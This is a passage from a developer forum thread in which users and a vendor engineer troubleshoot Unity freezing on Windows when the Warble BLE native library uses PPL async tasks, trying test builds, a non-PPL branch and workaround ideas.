but I'm pretty sure that's just an issue with the new firmware and will go away if I downgrade again, which I'm going to look into doing shortly. Attached is a VS2017 solution that builds a native dll that creates and completes an async task using the same Windows PPL classes Warble uses. If the same freezing behavior appears, then its highly likely a compatibility issue between Unity and Window's thread management for its async task classes. In that case, the issue is out of our hands and Unity and Microsoft need to find a way for PPL functions to properly work in Unity. Hrm, I'm not seeing any issues with firmware v1.4.1 on my Win10 machine. For me anyways, doing a lescan Thanks for the test solution Eric. I can confirm that this recreates the same freezing behavior as Warble calls. The task result code is 45 the first time around, and then unity freezes on 2nd play. Now that we have a minimum reproducible test, I'll see if there is a potential work-around. I doubt we'll ever get MS or Unity to help us on such of an issue because it is of tiny importance to them. So it will have to be something that the community here, or yourself will have to solve most likely. Let me play around with it a bit. Here is another discussion on how to get around this issue: Some stuff to check out: Example code on how to cleanup threads: Explanation on what Unity does when it exits Example code on how to fix the freeze without cleaning up your threads I guess that is the crux of the problem. Developers aren't supposed to manage the threadpool when using an async task library and as far as I am aware, there is no way to access the underlying Windows ThreadPool object that schedules the tasks. I did find a similar topic on the MSDN forum but it is 7yrs old and doesn't offer a solution. Yes, exactly Eric. I tried option 3 from my previous post. I'm calling GetCurrentThreadin your PPL async callback, and setting the DELETE restriction on the thread so that Unity ignores the thread when it shuts down the DLL. But that does not seem to be preventing the freeze. I've also submitted a bug report with Unity (), but I don't expect any movement there for weeks/months. How much of the code in Warble relies on PPL async tasks? I'm just curious how much work it is to swap it out with manual threading. Whether it's done by Mbientlab or the community, or myself. All of it. You could remove PPL tasks and directly use the returned IAsyncOperation type but there is no guarantee that that would fix the freezing issue and you have then put yourself in callback hell for no reason. Hello Eric, Correct me if i wrong, but i can see Only in win10_api.cpp file Are there other libraries for PPL tasks in the warble C++ project? Yes it does look like PPL is only used in that one file? Perhaps we can just build a proof of concept, (non-PPL version) of the NativeFunctions.ziptest solution you shared in this thread? We might need two calls. One that starts the thread, and one that terminates it, that we can use in Unity's OnApplicationQuit(). What I meant is all the Windows BLE code uses PPL tasks, which is the relevant portion of this thread. Again, there is no thread control when using the Windows BLE API. All you have to work with are the provided wrapper classes that encapsulate async tasks. Eric. Just to be clear... Are you (and by you I mean Mbientlab in general) working towards making the Mbientlab sensor work in Unity? I'm asking because it clearly says Windows Unity support on your product page, and you have two very engaged customers (myself and abcd) here willing to do whatever it takes to help. If you don't think you can get Unity to work, then make it an official stance, tells us and remove it from your marketing, so that we can move on and be productive elsewhere. If you do think you can get there, then lets start working on some options to explore. Can we can look at replacing PPL with another way of dealing with the IAsyncOperation? Maybe we can even do it all in C# directly using standard await, as explained here: ? Eric, To continue JImJam question and double check - When you said "All of it." , and "all the Windows BLE code uses PPL tasks, " Do you mean that PPL exists in "Windows.Devices.Bluetooth.h" , or it is ONLY in "win10_api.cpp" ? That method works in Visual Studio when .NET Framework apps that need to use WinRT classes; the Win10 plugin does the same thing if you install it in a .NET Framework project: I have no idea if it works in Unity but if it does, then great, you can just use the .NET Framework plugin and avoid the native dll entirely. The same Win10 plugin package also provides the same code compiled as a UWP class library so you could also build a UWP app if you wanted. In the meantime, I can rework the code to not use tasks. Good to hear you're going to try and help it getting it working in Unity Eric. Let's try going down both paths simultaneously. One of us (either abcd or myself) can try skipping the native dll entirely, whilst you rework the code to not use tasks. Will report findings as soon as possible, although I will be away for a couple of days. Devolved code pushed to the nopplbranch: @abcd Any chance you can test the noppl branch? I’m away for a couple more days. Thank you Eric. Hi 1. I tested the noppl branch, and Unity still freezes, and now also crashing after second time. @Eric - Is there something else to do ? Is the PPL is also inside the "Windows.Devices.Bluetooth.h" ? 2. I started to check the integration of MetaWear.Win10.DotNet DLL with Unity , but it seems that Unity doesn't recognize it . I share the code. As i am not Unity expert, @jimjam, it will be great if you can help on this when you back Played around with the noppl version a bit and it turns out the service discovery part of the connect code causes the same hangup. To fix this, I changed the connect code to only retrieve the gatt services rather than discover everything at once; gatt characteristics are instead only retrieve upon request. This did fix the hangup, however, it comes back again when you enable characteristic notifications. Documentation for event handling suggests that handlers are executed in their own thread so we're back to square one with the Windows SDK doing its own thread management. You can check this out with commits 18894d5b (Warble) and 11c19bc8 (Warble.NET) I also took some time to look into directly including System.Runtime.WindowsRuntime.dll directly into Unity, however, Unity repeatedly stated that that assembly would cause errors and unloaded it. This appears to be intentional according to this bug report: On the UWP side, there is an issue filed with loading the DataContractSerializer class, which is problematic as the C# API uses that class. A flag can be added to skip serialization so this isn't that big of an issue but still annoying nonetheless. This is pretty much going nowhere fast, so, as a last resort, the best option seems to be spawning a process that handles all of the MetaWear function calls and streams the sensor data back to the main app. This is pretty much going nowhere fast, so, as a last resort, the best option seems to be spawning a process that handles all of the MetaWear function calls and streams the sensor data back to the main app. So just to be clear on this - as SDK is not supporting Unity on Windows, you suggest that the only option is doing some "Bypass" such as streaming data into Unity from zeromq or rabbitmq ? You're confusing the MetaWear C# SDK with the BLE plugins. The C# SDK works in Unity 2018, barring that serialization bug on UWP which they need to fix (this can be worked around with some minor changes until then). The BLE code, external to the SDK, doesn't work in Unity, for all the reasons discussed in this thread. So, until they fix that threading issue, BLE code is best off handled separate from Unity, or you deal with the hassles of building a UWP app with the Unity editor.
https://mbientlab.com/community/discussion/comment/6743/
CC-MAIN-2019-30
refinedweb
2,646
71.65
i have added the sout(ex); in catch field and when i push the button it gives me this error : java.io.IOException: could not create audio stream from input stream i have added the sout(ex); in catch field and when i push the button it gives me this error : java.io.IOException: could not create audio stream from input stream no ... there are no error messages ... it should play the audio in background when i push the button ! .... but unfortunatly it dsnt do nythng :( Hi friends im new at this topic and i have tried all the things to make it work but without results .. :-< can you please tell me whats not going in this simple code ?? /* * To change... i have done a thing like that .. but it doesnt works .. :( public class DragMouseAdapter implements MouseListener{ JLabel templbl,lbl1,lbl2; @Override ... how can i do that ? can you explain me with an example ? sorry but im at start ... i have tried to make a Drag and Drop for type of Puzzle. Its my school project and im the only one who is stuck with this trouble ... it doesnt exchange me the Location of the Labels .. with... ah ok ... is it possible to drag a Label containing Image from a panel1 to another Label containing in panel2 ... making a type of exchange of Labels ? or its not possible due to the Panels ?? i tried to use img.addMouseListener()..etc but the add methods for ImageIcon doesnt seem to exist :( Hi friends .. i have been trying to do a thing like exchange 2 JLabels Location using MouseListener or MouseLocation without any success :( These 2 labels Contain ImageIcons. and have the same... HI i have been working on this project for a pair of days and i dont remember if i had this problem at the start as well or not ... because the programme sometime works perfectly and sometime... hi community! :p im new at java and need so much help :D so help me whenever you can ;) thnx
http://www.javaprogrammingforums.com/search.php?s=4acbb94b779904a5425db9c0775c44da&searchid=1461229
CC-MAIN-2015-14
refinedweb
337
75.61
This is a playground to test code. It runs a full Node.js environment and already has all of npm’s 400,000 packages pre-installed, including walt-compiler with all npm packages installed. Try it out: require()any package directly from npm awaitany promise instead of using callbacks (example) This service is provided by RunKit and is not affiliated with npm, Inc or the package authors. This is the main walt compiler package. npm install --save walt-compiler type Compile = (source: string, options?: Options) => Result Compile and run Walt code in browser: import { compile } from 'walt-compiler'; const buffer = compile(` let counter: i32 = 0; export function count(): i32 { counter += 1; return counter; } `).buffer(); WebAssembly.instantiate(buffer).then(result => { console.log(`First invocation: ${result.instance.exports.count()}`); console.log(`Second invocation: ${result.instance.exports.count()}`); }); Compile and save a .wasm file via Node.js: const { compile } = require('walt-compiler'); const fs = require('fs'); const buffer = compile(` let counter: i32 = 0; export function count(): i32 { counter += 1; return counter; } `).buffer(); fs.writeFileSync('bin.wasm', new Uint8Array(buffer)); type Result = { buffer: () => ArrayBuffer, ast: NodeType, semanticAST: NodeType } Unique (across function calls) ArrayBuffer instance. The Program root node containing the source program without any type information. This is the node passed to semantic parser. The Program root node containing the source program including the final type information. This is the AST version used to generate the final binary. type Options = { version?: number, encodeNames?: boolean, filename?: string, extensions: Array<Plugin> } The target WebAssembly Standard (not to be confused with compiler version) version to which the source should be compiled to. Currently supported versions: 0x01 Whether or not names section should be encoded into the binary output. This enables a certain level of extra debug output in supported browser DevTools. Increases the size of the final binary. Default: false Filename of the compiled source code. Used in error outputs. Default: unknown.walt An array of functions which are compiler extensions. See the Plugin section for plugin details. Default: [] note: Plugins are applied from right to left with the core language features applied last. The compiler may be extended via extensions or plugins. Each plugin must be a function return an object with the following keys: semantics, grammar. Where each value is a function. type Plugin = (Options) => { semantics: ({ parser: Function, fragment: Function }) => { [string]: next => ([node: NodeType, context]) => NodeType }, grammar: Function } Each plugin is capable of editing the following features of the compiler: grammar- The syntax or grammar which is considered valid by the compiler. This enables features like new keywords for example. semantics- The parsing of the ast. Each key in the object returned by this method is expected to be a middleware like parser function which may edit the node passed into it. For an example of how plugins work see the full list of core language feature plugins.
https://npm.runkit.com/walt-compiler
CC-MAIN-2020-29
refinedweb
473
50.23
Imagine the situation. You just finished deploying AD FS 2016 and Web Application Proxy (WAP) servers in a highly available environment with the AD FS namespace load balanced internally and externally. There are multiple AD FS servers and WAP servers. This is an interesting deployment project and all is going well. After verifying that core AD FS and WAP functionality works as expected you then move onto using WAP to publish Exchange to the Internet using pass through authentication. Unfortunately no plan survives contact with the enemy.... Instead of being able to see your lovely OWA splash screen when at Starbucks you instead are greeted with the below rather sad page: For make most glorious search engine benefit: Service Unavailable HTTP Error 503. The service is unavailable. Hmm. Maybe OWA is not running on the published Exchange server – let's try ECP instead. Nope same issue. Internally everything is just fine and all is working as expected. From the WAP servers themselves, DNS resolves to the correct endpoints. OWA and ECP can also be rendered as expected on the WAP server. The issue is only with the external publishing. Something is wrong with WAP. Reviewing WAP Configuration All of the required Exchange CAS namespaces were published using WAP. Below is the Remote Access management console on server WAP-2016-1. The OWA published application is highlighted, and then a zoomed view is shown for OWA. We can use the Remote Access Management console to open the properties of the published application, or use PowerShell. The PowerShell method is shown below. Get-WebApplicationProxyApplication "mail.wingtiptoys.ca/owa" | Format-List All of this looks OK. The correct certificate is selected and the certificate is valid in all respects. Since that all seems to be fine, let's review the WAP diagnostics to see what is happening WAP Troubleshooting Upon initial inspection it would seem that all is well in the WAP world. There are no errors logged in: Applications and Services Logs\AD FS\Admin All of these entries indicate nirvana, and they state: "The federation server proxy successfully retrieved and updated its configuration from the Federation Service 'sts.wingtiptoys.ca'." As noted earlier, the idpinitiatedSignon page was working as expected with no issues. In this case the URL used was: However, WAP logs to a different event log which is: Applications and Services Logs\Microsoft-Windows-Web Application Proxy/Admin When this log is reviewed note that there are errors. Specifically we can see EventID 12019 where there is an error with creating the WAP listener. The details of the error are: Web Application Proxy could not create a listener for the following URL:. Cause: The filename, directory name, or volume label syntax is incorrect. (0x8007007b). Well that would be a problem, no? Addressing WAP 2016 Application Publishing Error The name that the error is referring to as invalid is highlighted below. It is quite common to copy the published URL and then paste it into all of the relevant fields. This is efficient and also prevents making typos. However, if the URL is pasted into the Name field as shown above you will find yourself in a pickle and probably reading this post..... The issue is due to the "/" invalid character in the name field. Simply remove the offending special character to address the issue. To do this we can right click the WAP published application, and chose EDIT. Note in the below example, the Name field was edited and now contains "OWA" Complete the wizard to save changes. Allow for WAP to save and update its configuration. This could also be done in PowerShell using the Set-WebApplicationProxyApplication cmdlet. As an example: Set-WebApplicationProxyApplication -BackendServerUrl "" -ExternalCertificateThumbprint 'BD4074969105149328DBA6BC8F7F0FFC9509C74F' -ExternalUrl "" -Name 'OWA' -ID '8D8344E0-52A9-ED1D-692C-81BF039813B5' This was repeated for all published applications. Note the highlighted Name column - all of the published applications now have simplified names. Now it is time to test, and you should be back in business! Note that this issue seems to be specific to WAP 2016, and was not present on WAP 2012 R2. Cheers, Rhoderick Just got done converting to WAP/ADFS 2016 and had one published app that wasn’t working and it was driving me nuts. Was chasing the firewall and LB just looking for whatever gremlin was the culprit, and eventually a blog led me here. I can’t believe it’s a special character in the label… And all is good after you edited the name JR ? Cheers, Rhoderick Geeeeze. Been pulling my hair out for weeks on this. In my case, I didn’t see anything in any of the logs. Just the 503 error and no more details anywhere. This is clearly a bug. It should either not care about the name or prevent you from keying in an invalid one. That’s exactly why I posted this Daniel so you can work around the issue. How come you did not find this initially? Were you using a different search team that is not in this post? Cheers, Rhoderick
https://blogs.technet.microsoft.com/rmilne/2017/07/19/wap-2016-published-application-not-working-http-error-503/
CC-MAIN-2018-05
refinedweb
842
65.22
I was strolling around one of Bangkok's better known shopping malls, the Emporium, and I walked by a booth selling the usual pralines and truffles. These are never cheap in Thailand because they're usually imported. I was about to make tracks when I noticed this booth sold a range of bars with well designed packaging featuring a sort of coat of arms emblazoned with "Duc de Praslin - Belgium" in various colors. That wasn't what grabbed me. Nowadays, every bar is trying to inflate its reputation by association with Switzerland or Belgium. No, the real attention grabber was the fact that each of the bars in this Origin Dark Collection was named after a different country. I couldn't be a hundred percent sure if the country names were tributes to cocoa-producing countries or if the chocolate bars, each 45 grams in size, were really manufactured from cocoa beans grown in that country. I looked at the labels closely. The bars were manufactured by a company called Gallothai, based in Bangkok. Thai-made chocolate? That was another surprise. Thailand does not enjoy a chocolate-making reputation. The chocolates you'll find stocked in the local 7-11's aren't Thai. They're mostly made in Malaysia or China. I picked up two bars on the spot just to test the waters. To compare whether the bean taste really was different from one bar to the other, I chose two bars with 64% cocoa solid content. The Costa Rica bar was the first one. I wrote Gallothai later, and the sales manager informed me that, yep, each country-named bar really is made from cocoa beans from that country. In more evolved choco markets, like the U.S., various country bean bars aren't the hardest thing to find, Gallothai has the beans roasted by a third party cocoa processor in Belgium. The Belgian owner of Gallothai, Jean-Louis Grandorge, wrote me a few days later and said that he's been producing chocolate in Thailand since the corrupt American politician and sex maniac, Bill Clinton, assumed the White House. Currently, about 40,000 Americans live in Costa Rica, almost 1% of the Costa Rican population, and according to one stat I read online, the highest American expat scene per capita. Americans like its weather, its lower costs, its friendliness. But do they like its cocoa beans? Gallothai describes their Costa Rica bar on the packaging as "a strong dark chocolate, with a taste enhanced by the exquisite bitter cocoa aroma. An overall delicate smoky and woody bouquet gives this chocolate its own characteristic taste." The Costa Rican bar is composed of 62% cocoa mass and only 2% cocoa butter. The taste started out smooth with just the right amount of bitterness but quickly went downhill from there. For a 64% bar, considered higher dark by many, the flavor was initially palatable, and I could see solely milk chocophiles going over to the "dark side" if they were to try only a tiny piece. Ever more surprising was that a Thai company pulled this off. Costa Rica was better than many a European or Australian bar I've sampled in the Republic. The big downside: the price. 45 grams is an adequate size for a chocolate snack, but I think Gallothai keeps the bars at this size in order to keep the price reasonable. Thailand is a low cost country for food and drink, and that makes this bar look expensive. For slightly more than half the price of this bar, I could have walked 2 minutes further into the food court and ordered a vegetarian meal of rice and three dishes. The reality, as I found out from Gallothai's owner later, is that the Duc de Praslin bars are actually made in Belgium. The word 'made' must be defined strictly here. The chocolate which goes into the the Origin Dark Collections bars is produced in Belgium by a company called Belcolade, but the chocolate is fashioned into 45 gram bars and packaged in Thailand by Gallothai. All chocolate, especially quality chocolate, is relatively expensive in Thailand. When you compare the Gallothai price to those of, say, import Lindts or Movenpicks, you see that Gallothai's bars fall on the highest side without it yet having the cachet value to charge those prices. Lindt and Movenpick have economies of scale Gallothai doesn't. They can rest on the European reputation for chocolate manufacturing which Thailand doesn't have. When I thought the bars were Thai-made (though sourced from Belgian chocolate) I penalized the rating, figuring they were expensive for something produced in Southeast Asia. Realizing they were really crafted in Belgium, the chocolates fall within the acceptable price range, but on the higher side, for a Belgian import A piece of work for Thailand but you'll pay for the privilege.
http://www.dougsrepublic.com/chocolate/20110308-duc-costarica64.php
CC-MAIN-2018-09
refinedweb
816
69.72
Ex it is an actual need or not. Some OTP related documentation to look at: If you need a durable jobs, retries with exponential backoffs, dynamically scheduled jobs in the future - that are all able to survive application restarts, then an externally backed queueing library such as Exq could be a good fit. If you are starting a brand new project, I would also take a look at Faktory. It provides language independent queueing system, which means this logic doesn't have to be implemented across different languages and can use a thin client such as faktory_worker_ex. This assumes you have an instance of Redis to use. The easiest way to install it on OSX is via brew: > brew install redis To start it: > redis-server If you prefer video instructions, check out the screencast on elixircasts.io which details how to install and use the Exq library: Add :exq to your mix.exs deps (replace version with the latest hex.pm package version): defp deps do [ # ... other deps {:exq, "~> 0.14.0"} ] end Then run mix deps.get. By default, Exq will use configuration from your config.exs file. You can use this to configure your Redis host, port, password, as well as namespace (which helps isolate the data in Redis). If you would like to specify your options as a Redis URL, that is also an option using the url config key (in which case you would not need to pass the other Redis options). Configuration options may optionally be given in the {:system, "VARNAME"} format, which will resolve to the runtime environment value. Other options include: queueslist specifies which queues Exq will listen to for new jobs. concurrencysetting will let you configure the amount of concurrent workers that will be allowed, or :infinite to disable any throttling. nameoption allows you to customize Exq's registered name, similar to using Exq.start_link([name: Name]). The default is Exq. start_on_applicationis false, Exq won't be started automatically when booting up you Application. You can start it with Exq.start_link/1. shutdown_timeoutis the number of milliseconds to wait for workers to finish processing jobs when the application is shutting down. It defaults to 5000 ms. modeoption can be used to control what components of Exq are started. This would be useful if you want to only enqueue jobs in one node and run the workers in different node. :default- starts worker, enqueuer and API. :enqueuer- starts only the enqueuer. :api- starts only the api. [:api, :enqueuer]- starts both enqueuer and api. backoffoption allows you to customize the backoff time used for retry when a job fails. By default exponential time scaled based on job's retry_count is used. To change the default behavior, create a new module which implements the Exq.Backoff.Behaviourand set backoff option value to the module name. config :exq, name: Exq, host: "127.0.0.1", port: 6379, password: "optional_redis_auth", namespace: "exq", concurrency: :infinite, queues: ["default"], poll_timeout: 50, scheduler_poll_timeout: 200, scheduler_enable: true, max_retries: 25, mode: :default, shutdown_timeout: 5000 Exq supports concurrency setting per queue. You can specify the same concurrency option to apply to each queue or specify it based on a per queue basis. Concurrency for each queue will be set at 1000: config :exq, host: "127.0.0.1", port: 6379, namespace: "exq", concurrency: 1000, queues: ["default"] Concurrency for q1 is set at 10_000 while q2 is set at 10: config :exq, host: "127.0.0.1", port: 6379, namespace: "exq", queues: [{"q1", 10_000}, {"q2", 10}] Exq will automatically retry failed job. It will use an exponential backoff timing similar to Sidekiq or delayed_job to retry failed jobs. It can be configured via these settings: config :exq, host: "127.0.0.1", port: 6379, ... scheduler_enable: true, max_retries: 25 Note that scheduler_enable has to be set to true and max_retries should be greater than 0. Any job that has failed more than max_retries times will be moved to dead jobs queue. Dead jobs could be manually re-enqueued via Sidekiq UI. Max size and timeout of dead jobs queue can be configured via these settings: config :exq, dead_max_jobs: 10_000, dead_timeout_in_seconds: 180 * 24 * 60 * 60, # 6 months You can add Exq into your OTP application list, and it will start an instance of Exq along with your application startup. It will use the configuration from your config.exs file. def application do [ applications: [:logger, :exq], #other stuff... ] end When using Exq through OTP, it will register a process under the name Elixir.Exq - you can use this atom where expecting a process name in the Exq module. If you would like to control Exq startup, you can configure Exq to not start anything on application start. For example, if you are using Exq along with Phoenix, and your workers are accessing the database or other resources, it is recommended to disable Exq startup and manually add it to the supervision tree. This can be done by setting start_on_application to false and adding it to your supervision tree: config :exq, start_on_application: false # Define workers and child supervisors to be supervised children = [ # Start the Ecto repository supervisor(MyApp.Repo, []), # Start the endpoint when the application starts supervisor(MyApp.Endpoint, []), supervisor(Exq, []), ] Exq uses Redix client for communication with redis server. The client can be configured to use sentinel via redis_options. Note: you need to have Redix 0.9.0+. config :exq redis_options: [ sentinel: [sentinels: [[host: "127.0.0.1", port: 6666]], group: "exq"], database: 0, password: nil, timeout: 5000, name: Exq.Redis.Client, socket_opts: [] ] If you'd like to try Exq out on the iex console, you can do this by typing: > mix deps.get and then: > iex -S mix You can run Exq standalone from the command line, to run it: > mix do app.start, exq.run To enqueue jobs: {:ok, ack} = Exq.enqueue(Exq, "default", MyWorker, ["arg1", "arg2"]) {:ok, ack} = Exq.enqueue(Exq, "default", "MyWorker", ["arg1", "arg2"]) ## Don't retry job in per worker {:ok, ack} = Exq.enqueue(Exq, "default", MyWorker, ["arg1", "arg2"], max_retries: 0) ## max_retries = 10, it will override :max_retries in config {:ok, ack} = Exq.enqueue(Exq, "default", MyWorker, ["arg1", "arg2"], max_retries: 10) In this example, "arg1" will get passed as the first argument to the perform method in your worker, "arg2" will be second argument, etc. You can also enqueue jobs without starting workers: {:ok, sup} = Exq.Enqueuer.start_link([port: 6379]) {:ok, ack} = Exq.Enqueuer.enqueue(Exq.Enqueuer, "default", MyWorker, []) You can also schedule jobs to start at a future time. You need to make sure scheduler_enable is set to true. Schedule a job to start in 5 mins: {:ok, ack} = Exq.enqueue_in(Exq, "default", 300, MyWorker, ["arg1", "arg2"]) Schedule a job to start at 8am 2015-12-25 UTC: time = Timex.now() |> Timex.shift(days: 8) {:ok, ack} = Exq.enqueue_at(Exq, "default", time, MyWorker, ["arg1", "arg2"]) To create a worker, create an elixir module matching the worker name that will be enqueued. To process a job with "MyWorker", create a MyWorker module. Note that the perform also needs to match the number of arguments as well. Here is an example of a worker: defmodule MyWorker do def perform do end end We could enqueue a job to this worker: {:ok, jid} = Exq.enqueue(Exq, "default", MyWorker, []) The 'perform' method will be called with matching args. For example: {:ok, jid} = Exq.enqueue(Exq, "default", "MyWorker", [arg1, arg2]) Would match: defmodule MyWorker do def perform(arg1, arg2) do end end If you'd like to get Job metadata information from a worker, you can call worker_job from within the worker: defmodule MyWorker do def perform(arg1, arg2) do # get job metadata job = Exq.worker_job() end end The list of queues that are being monitored by Exq is determined by the config.exs file or the parameters passed to Exq.start_link. However, we can also dynamically add and remove queue subscriptions after Exq has started. To subscribe to a new queue: # last arg is optional and is the max concurrency for the queue :ok = Exq.subscribe(Exq, "new_queue_name", 10) To unsubscribe from a queue: :ok = Exq.unsubscribe(Exq, "queue_to_unsubscribe") To unsubscribe from all queues: :ok = Exq.unsubscribe_all(Exq) If you'd like to customize worker execution and/or create plugins like Sidekiq/Resque have, Exq supports custom middleware. The first step would be to define the middleware in config.exs and add your middleware into the chain: middleware: [Exq.Middleware.Stats, Exq.Middleware.Job, Exq.Middleware.Manager, Exq.Middleware.Logger] You can then create a module that implements the middleware behavior and defines before_work, after_processed_work and after_failed_work functions. You can also halt execution of the chain as well. For a simple example of middleware implementation, see the Exq Logger Middleware. If you would like to use Exq alongside Phoenix and Ecto, add :exq to your mix.exs application list: def application do [ mod: {Chat, []}, applications: [:phoenix, :phoenix_html, :cowboy, :logger, :exq] ] end Assuming you will be accessing the database from Exq workers, you will want to lower the concurrency level for those workers, as they are using a finite pool of connections and can potentially back up and time out. You can lower this through the concurrency setting, or perhaps use a different queue for database workers that have a lower concurrency just for that queue. Inside your worker, you would then be able to use the Repo to work with the database: defmodule Worker do def perform do HelloPhoenix.Repo.insert!(%HelloPhoenix.User{name: "Hello", email: "[email protected]"}) end end To use alongside Sidekiq / Resque, make sure your namespaces as configured in Exq match the namespaces you are using in Sidekiq. By default, Exq will use the exq namespace, so you will have to change that. Another option is to modify Sidekiq to use the Exq namespace in the sidekiq initializer in your ruby project: Sidekiq.configure_server do |config| config.redis = { url: 'redis://127.0.0.1:6379', namespace: 'exq' } end Sidekiq.configure_client do |config| config.redis = { url: 'redis://127.0.0.1:6379', namespace: 'exq' } end For an implementation example, see sineed's demo app illustrating Sidekiq to Exq communication. If you would like to exclusively send some jobs from Sidekiq to Exq as your migration strategy, you should create queue(s) that are exclusively listened to only in Exq (and configure those in the queue section in the Exq config). Make sure they are not configured to be listened to in Sidekiq, otherwise Sidekiq will also take jobs off that queue. You can still Enqueue jobs to that queue in Sidekiq even though they are not being monitored: Sidekiq::Client.push('queue' => 'elixir_queue', 'class' => 'ElixirWorker', 'args' => ['foo', 'bar']) By default, your Redis server could be open to the world. As by default, Redis comes with no password authentication, and some hosting companies leave that port accessible to the world.. This means that anyone can read data on the queue as well as pass data in to be run. Obviously this is not desired, please secure your Redis installation by following guides such as the Digital Ocean Redis Security Guide. A Node can be stopped unexpectedly while processing jobs due to various reasons like deployment, system crash, OOM, etc. This could leave the jobs in the in-progress state. Exq comes with two mechanisms to handle this situation. Exq identifies each node using an identifier. By default machine's hostname is used as the identifier. When a node comes back online after a crash, it will first check if there are any in-progress jobs for its identifier. Note that it will only re-enqueue jobs with the same identifier. There are environments like Heroku or Kubernetes where the hostname would change on each deployment. In those cases, the default identifier can be overridden config :exq, node_identifier: MyApp.CustomNodeIdentifier defmodule MyApp.CustomNodeIdentifier do @behaviour Exq.NodeIdentifier.Behaviour def node_id do # return node ID, perhaps from environment variable, etc System.get_env("NODE_ID") end end Same node recovery is straightforward and works well if the number of worker nodes is fixed. There are use cases that need the worker nodes to be autoscaled based on the workload. In those situations, a node that goes down might not come back for a very long period. Heartbeat mechanism helps in these cases. Each node registers a heartbeat at regular interval. If any node misses 5 consecutive heartbeats, it will be considered dead and all the in-progress jobs belong to that node will be re-enqueued. This feature is disabled by default and can be enabled using the following config:j config :exq, heartbeat_enable: true, heartbeat_interval: 60_000, missed_heartbeats_allowed: 5 Exq has a separate repo, exq_ui which provides with a Web UI to monitor your workers: See for more details. Typically, Exq will start as part of the application along with the configuration you have set. However, you can also start Exq manually and set your own configuration per instance. Here is an example of how to start Exq manually: {:ok, sup} = Exq.start_link To connect with custom configuration options (if you need multiple instances of Exq for example), you can pass in options under start_link: {:ok, sup} = Exq.start_link([host: "127.0.0.1", port: 6379, namespace: "x"]) By default, Exq will register itself under the Elixir.Exq atom. You can change this by passing in a name parameter: {:ok, exq} = Exq.start_link(name: Exq.Custom) Exq.Mock module provides few options to test your workers: # change queue_adapter in config/test.exs config :exq, queue_adapter: Exq.Adapters.Queue.Mock # start mock server in your test_helper.exs Exq.Mock.start_link(mode: :redis) Exq.Mock currently supports three modes. The default mode can provided on the Exq.Mock.start_link call. The mode could be overridden for each test by calling Exq.Mock.set_mode(:fake) This could be used for integration testing. Doesn't support async: true option. The jobs get enqueued in a local queue and never get executed. Exq.Mock.jobs() returns all the jobs. Supports async: true option. The jobs get executed in the same process. Supports async: true option. To donate, send to: Bitcoin (BTC): 17j52Veb8qRmVKVvTDijVtmRXvTUpsAWHv Ethereum (ETH): 0xA0add27EBdB4394E15b7d1F84D4173aDE1b5fBB3 For issues, please submit a Github issue with steps on how to reproduce the problem. Contributions are welcome. Tests are encouraged. To run tests / ensure your changes have not caused any regressions: mix test --no-start To run the full suite, including failure conditions (can have some false negatives): mix test --trace --include failure_scenarios:true --no-start Anantha Kumaran / @ananthakumaran (Lead) Justin McNally (j-mcnally) (structtv), zhongwencool (zhongwencool), Joe Webb (ImJoeWebb), Chelsea Robb (chelsea), Nick Sanders (nicksanders), Nick Gal (nickgal), Ben Wilson (benwilson512), Mike Lawlor (disbelief), colbyh (colbyh), Udo Kramer (optikfluffel), Andreas Franzén (triptec),Josh Kalderimis (joshk), Daniel Perez (tuvistavie), Victor Rodrigues (rodrigues), Denis Tataurov (sineed), Joe Honzawa (Joe-noh), Aaron Jensen (aaronjensen), Andrew Vy (andrewvy), David Le (dl103), Roman Smirnov (romul), Thomas Athanas (typicalpixel), Wen Li (wli0503), Akshay (akki91), Rob Gilson (D1plo1d), edmz (edmz), and Benjamin Tan Wei Hao (benjamintanwei.
https://awesomeopensource.com/project/akira/exq
CC-MAIN-2021-21
refinedweb
2,482
56.35
:ScanIAm wrote:Console.WriteLine(new String("Bob").Length); The part that concerns me is the accessing of the function 'Length' when you don't really know that the new String has actually been created. namespace ConsoleApplication1 { class Program { static void Main(string[] args) { System.Console.WriteLine(new System.String('c', 10).Length); } } } here you are telling the runtime to create a new object of type String by calling the constructor with provided parameters, get the Length property, and pass a copy of it to the Console.WriteLine function. from there it doesn't matter what happens to the String object because it is no longer needed; the WriteLine function has it's own copy (because it's a value type) of what we wanted, so no worries. am i right, guys? Thread Closed This thread is kinda stale and has been closed but if you'd like to continue the conversation, please create a new thread in our Forums, or Contact Us and let us know.
https://channel9.msdn.com/Forums/TechOff/259414-is-new-objectproperty-or-new-objectmethod-a-good-idea?page=2
CC-MAIN-2015-48
refinedweb
166
54.86
#include <GU_RandomPoint.h> Definition at line 24 of file GU_RandomPoint.h. Random Point Generation. This method generates random points from the primitives in the detail. gdp - geometry containing the primitives (and which will contain the points) npoints - The number of points to generate seed - random number seed probability - A probability array. There should be one entry per primitive which determines the probabilty of that primitive having a point generated from it. group - Optionally, only generate from this group of primitives prim_num - Store the primitive number associated with the scattered point prim_uv - Store the primitive's u/v associated with the point Points will be generated using as close to a uniform distribution as possible (in uv space on the primitives). The point locations should remain constant based on primitive number, regardless of shearing or scaling. This method generates random points from the points in the detail. dstgdp geometry which will contain the generated points srcgdp geometry which will contains the source points (can be the same as dstgdp) srcptgrp the source point group from which to generate points ptsperpt- Whether the npts parameter indicates the total number of number of points to generate or the number per point. npoints - The number of points to generate (total or per-point) seed - random number seed ptnum - Store the point number of the source point. ptidx - Store the index for each point within a particular source point. For example if a particular source point generates ten points, this attribute's values will range from 0-9. emit - An attribute that holds the probability for each source point, which determines the probabilty of that point having points generated from it. attribs - A pattern of attributes to copy from the source points to the generated points. Returns - a contiguous range containing the generated points. In ptsperpt mode, the source point's "id" attribute will be used for stable random probability generation.
http://www.sidefx.com/docs/hdk/class_g_u___random_point.html
CC-MAIN-2018-05
refinedweb
316
51.89
